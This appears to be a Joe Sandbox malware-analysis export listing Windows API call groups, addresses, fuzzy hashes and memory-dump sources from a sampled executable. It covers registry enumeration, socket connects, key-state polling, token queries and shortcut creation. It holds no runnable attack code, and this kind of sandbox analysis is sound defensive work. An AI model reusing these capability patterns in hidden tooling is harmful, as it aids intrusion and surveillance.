• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
• Opcode ID: dbefa50e8bddcecdac40b8431afb26b8e0c0a721010d35008e23ebbafee5b46c
• Instruction ID: af48a194967ec19e96040e1379babb187300d0f848cd0f2203fed9ce63ab7d0b
• Opcode Fuzzy Hash: dbefa50e8bddcecdac40b8431afb26b8e0c0a721010d35008e23ebbafee5b46c
• Instruction Fuzzy Hash: FF5168B5A00209EFDB14CF58C884AAAB7B8FF8D314B158559ED49DB350E330EA51DFA0
APIs
  • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
  • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
• LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00F206EE
• GetProcAddress.KERNEL32(00000000,?), ref: 00F2077D
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00F2079B
• GetProcAddress.KERNEL32(00000000,?), ref: 00F207E1
• FreeLibrary.KERNEL32(00000000,00000004), ref: 00F207FB
  • Part of subcall function 00EDE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00F0A574,?,?,00000000,00000008), ref: 00EDE675
  • Part of subcall function 00EDE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00F0A574,?,?,00000000,00000008), ref: 00EDE699
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
• String ID:
• API String ID: 327935632-0
• Opcode ID: 7b78c3f6e77acb8e148599db8f78786b5a58deef8e8bdf0b6e847ae5beb624f4
• Instruction ID: fdb8ff2644f43274e083977ca4799d0eeee55c8ec8edddac50cc4465e960ab42
• Opcode Fuzzy Hash: 7b78c3f6e77acb8e148599db8f78786b5a58deef8e8bdf0b6e847ae5beb624f4
• Instruction Fuzzy Hash: 2A516B76A00219DFCB00EFA8D985EADB7F5FF59310B148069E915AB352DB31ED42DB80
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F23C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F22BB5,?,?), ref: 00F23C1D
                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F22EEF
                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F22F2E
                                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F22F75
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00F22FA1
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F22FAE
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 3740051246-0
• Opcode ID: bd20bc7f6de13d932148cf8d04355ec1df3ffe2824774b875f9739c758c071ff
• Instruction ID: 49826db610b85fd814be0e80c97b0573128da76134fbc8710059f4bfe54f5119
• Opcode Fuzzy Hash: bd20bc7f6de13d932148cf8d04355ec1df3ffe2824774b875f9739c758c071ff
• Instruction Fuzzy Hash: D0516872208204AFC704EF68CD91F6ABBF8BF88314F04482DF595972A1DB35E905EB52
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 143aa005c8f894551e94d577d9034033e7e148c3311f39a522b877f9fad0b02e
• Instruction ID: 1915c3061c6919050118262d6cc8f518c824a51c6ad0be8c7a3a7dc288a82160
• Opcode Fuzzy Hash: 143aa005c8f894551e94d577d9034033e7e148c3311f39a522b877f9fad0b02e
• Instruction Fuzzy Hash: AD41B63AD00528ABC710DB68DC44FAD7B68FB09360F550265F969A72E1D770AD01F6D0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F112B4
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F112DD
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F1131C
  • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
  • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F11341
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F11349
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
• Opcode ID: 7f053fd9020ca9c45e476efcedec42f1dd181c3a757235246be7bafb84446a0c
• Instruction ID: b8189a6bd3906f91048f80f1688267fd55a80164f3a3c639a71187cdba32e8ad
• Opcode Fuzzy Hash: 7f053fd9020ca9c45e476efcedec42f1dd181c3a757235246be7bafb84446a0c
• Instruction Fuzzy Hash: 95410C35A00105DFCB01EF64CA95EAEBBF5FF49310B148099E91AAB3A2CB31ED41DB51
APIs
• GetCursorPos.USER32(000000FF), ref: 00EDB64F
• ScreenToClient.USER32(00000000,000000FF), ref: 00EDB66C
• GetAsyncKeyState.USER32(00000001), ref: 00EDB691
• GetAsyncKeyState.USER32(00000002), ref: 00EDB69F
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: ec1f6c9d5ae8a21eda8b607fd0a4e9d92758b811159ca872143e3477d877a366
• Instruction ID: d0a2197f25d9028949b573235daaf4de6e55dcd76b97539d8b1539bee1bf997f
• Opcode Fuzzy Hash: ec1f6c9d5ae8a21eda8b607fd0a4e9d92758b811159ca872143e3477d877a366
• Instruction Fuzzy Hash: 81419D35904119FBDF199F64C884AEDBBB4FF05334F11431AF829A6290DB34A991EFA0
APIs
• GetWindowRect.USER32(?,?), ref: 00EFB369
• PostMessageW.USER32(?,00000201,00000001), ref: 00EFB413
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00EFB41B
• PostMessageW.USER32(?,00000202,00000000), ref: 00EFB429
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00EFB431
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3382505437-0
APIs
• IsWindowVisible.USER32(?), ref: 00EFDBD7
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EFDBF4
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EFDC2C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00EFDC52
• _wcsstr.LIBCMT ref: 00EFDC5C
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EFBC90
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EFBCC2
• __itow.LIBCMT ref: 00EFBCDA
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EFBD00
• __itow.LIBCMT ref: 00EFBD11
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
APIs
  • Part of subcall function 00EC50E6: _wcsncpy.LIBCMT ref: 00EC50FA
• GetFileAttributesW.KERNEL32(?,?,?,?,00F060C3), ref: 00F06369
• GetLastError.KERNEL32(?,?,?,00F060C3), ref: 00F06374
• CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00F060C3), ref: 00F06388
• _wcsrchr.LIBCMT ref: 00F063AA
  • Part of subcall function 00F06318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00F060C3), ref: 00F063E0
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
• String ID:
• API String ID: 3633006590-0
APIs
  • Part of subcall function 00F1A82C: inet_addr.WSOCK32(00000000), ref: 00F1A84E
• socket.WSOCK32(00000002,00000001,00000006), ref: 00F18BD3
• WSAGetLastError.WSOCK32(00000000), ref: 00F18BE2
• connect.WSOCK32(00000000,?,00000010), ref: 00F18BFE
Similarity
• API ID: ErrorLastconnectinet_addrsocket
• String ID:
• API String ID: 3701255441-0
APIs
• IsWindow.USER32(00000000), ref: 00F18441
• GetForegroundWindow.USER32 ref: 00F18458
• GetDC.USER32(00000000), ref: 00F18494
• GetPixel.GDI32(00000000,?,00000003), ref: 00F184A0
• ReleaseDC.USER32(00000000,00000003), ref: 00F184DB
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EDAFE3
• SelectObject.GDI32(?,00000000), ref: 00EDAFF2
• BeginPath.GDI32(?), ref: 00EDB009
• SelectObject.GDI32(?,00000000), ref: 00EDB033
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
APIs
• __calloc_crt.LIBCMT ref: 00EE21A9
• CreateThread.KERNEL32(?,?,00EE22DF,00000000,?,?), ref: 00EE21ED
• GetLastError.KERNEL32 ref: 00EE21F7
• _free.LIBCMT ref: 00EE2200
• __dosmaperr.LIBCMT ref: 00EE220B
  • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
• String ID:
• API String ID: 2664167353-0
APIs
• GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EFABD7
• GetLastError.KERNEL32(?,00EFA69F,?,?,?), ref: 00EFABE1
• GetProcessHeap.KERNEL32(00000008,?,?,00EFA69F,?,?,?), ref: 00EFABF0
• HeapAlloc.KERNEL32(00000000,?,00EFA69F,?,?,?), ref: 00EFABF7
• GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EFAC0E
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CLSIDFromProgID.OLE32 ref: 00EF9ADC
                                                                                                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 00EF9AF7
                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000), ref: 00EF9B05
                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00EF9B15
                                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(?,?), ref: 00EF9B21
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3897988419-0
                                                                                                                                                                                                                                                      • Opcode ID: 4914598391f740be1fb0f734e637aba20e722cd8b17e50db6bd4139120c7d32b
                                                                                                                                                                                                                                                      • Instruction ID: a064293ab70a10fd7729074aae34e682431272f0099ad7f9adb01dddbf80ea01
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4914598391f740be1fb0f734e637aba20e722cd8b17e50db6bd4139120c7d32b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF018B7A60021DBFDB114F68EC44BBEBAEDEB55352F148024FE45E2211D770DD40ABA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F07A74
                                                                                                                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00F07A82
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F07A8A
                                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00F07A94
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F07AD0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2833360925-0
                                                                                                                                                                                                                                                      • Opcode ID: 4a287a7708c27afbcf6365f6816813e2d155a5994c2e2e1c1bbeddf2fd4681f6
                                                                                                                                                                                                                                                      • Instruction ID: 6d3195a5386a69e486114f1f44105cf37f3e6b69b2826a14cd1467767d9baab4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a287a7708c27afbcf6365f6816813e2d155a5994c2e2e1c1bbeddf2fd4681f6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E012D75E0861DDBDF04AFE4DC48ADDBB78FB59711F400495D902B22A0DB38AA50B7A1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EFAADA
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EFAAE4
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EFAAF3
                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EFAAFA
                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EFAB10
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                                                                                      • Opcode ID: 0873a1346c55cb7206ae5de468a6d6e0af89ddad8db2bf27d157b68358ff2726
                                                                                                                                                                                                                                                      • Instruction ID: 607901fa0cc3a824ac4fe116f6bef3e66264970b64de0ff6dd1ec34222b5acd0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0873a1346c55cb7206ae5de468a6d6e0af89ddad8db2bf27d157b68358ff2726
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77F04F7530020C6FEB110FA4EC88E7B3B6DFF46758F040029FE45DB190CA6098019A61
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EFAA79
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EFAA83
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EFAA92
                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EFAA99
                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EFAAAF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                                                                                      • Opcode ID: 09fc3b0b49c0b1f836b5ef85cd0d01a191e58c750744cd57f4e05851c2804121
                                                                                                                                                                                                                                                      • Instruction ID: f3c09f8a1724d4c95b4d8a7558f204e31615a69986d97e1c9ab4f0578478e628
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09fc3b0b49c0b1f836b5ef85cd0d01a191e58c750744cd57f4e05851c2804121
• Instruction Fuzzy Hash: 9AF04F792002186FEB115FA4AC89E7B3BACFF4A798F040429FE45DB290DA609C45DB61
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00EFEC94
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00EFECAB
• MessageBeep.USER32(00000000), ref: 00EFECC3
• KillTimer.USER32(?,0000040A), ref: 00EFECDF
• EndDialog.USER32(?,00000001), ref: 00EFECF9
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: 7709594c44907a6374097ba366d7122c18a2d82205e56bfb856ca7319d7634c8
• Instruction ID: d9400c62ac24b368ae7def4b359fbb3c28334de854327f522384d88f71e04794
• Opcode Fuzzy Hash: 7709594c44907a6374097ba366d7122c18a2d82205e56bfb856ca7319d7634c8
• Instruction Fuzzy Hash: 4D01D63450079C9BEB245F10DE4EBA6B7B8FB10709F04155DBA42711E0DBF0B944CB50
APIs
• EndPath.GDI32(?), ref: 00EDB0BA
• StrokeAndFillPath.GDI32(?,?,00F3E680,00000000,?,?,?), ref: 00EDB0D6
• SelectObject.GDI32(?,00000000), ref: 00EDB0E9
• DeleteObject.GDI32 ref: 00EDB0FC
• StrokePath.GDI32(?), ref: 00EDB117
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: 9ad1b7eae84629f98a3176793cf509bc532cc85ec021ad55ee974f19e129c091
• Instruction ID: 267e18a3c0c18421407c2f16bf8589b7d107c66070658157c2c684db34834506
• Opcode Fuzzy Hash: 9ad1b7eae84629f98a3176793cf509bc532cc85ec021ad55ee974f19e129c091
• Instruction Fuzzy Hash: 17F0193400024CEFDB219F69EC0C7A53B68FB117A6F189315E8A5551F0E7318997EF10
APIs
• CoInitialize.OLE32(00000000), ref: 00F0F2DA
• CoCreateInstance.OLE32(00F4DA7C,00000000,00000001,00F4D8EC,?), ref: 00F0F2F2
• CoUninitialize.OLE32 ref: 00F0F555
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize
• String ID: .lnk
• API String ID: 948891078-24824748
• Opcode ID: 79c0f8ba6c0f02b464c2e4ac6e7675aaf27937ede2e4230526699747f921d4b2
• Instruction ID: da1651f8d939d68d963ac385349cd768f7c5a6fa58d7b3246874ee084c103ced
• Opcode Fuzzy Hash: 79c0f8ba6c0f02b464c2e4ac6e7675aaf27937ede2e4230526699747f921d4b2
• Instruction Fuzzy Hash: 78A14C71104201AFD300EF64CC91EAFB7E8EF98714F00595DF559A7292EB71EA4ACB52
APIs
  • Part of subcall function 00EC660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC53B1,?,?,00EC61FF,?,00000000,00000001,00000000), ref: 00EC662F
• CoInitialize.OLE32(00000000), ref: 00F0E85D
• CoCreateInstance.OLE32(00F4DA7C,00000000,00000001,00F4D8EC,?), ref: 00F0E876
• CoUninitialize.OLE32 ref: 00F0E893
  • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
  • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
• String ID: .lnk
• API String ID: 2126378814-24824748
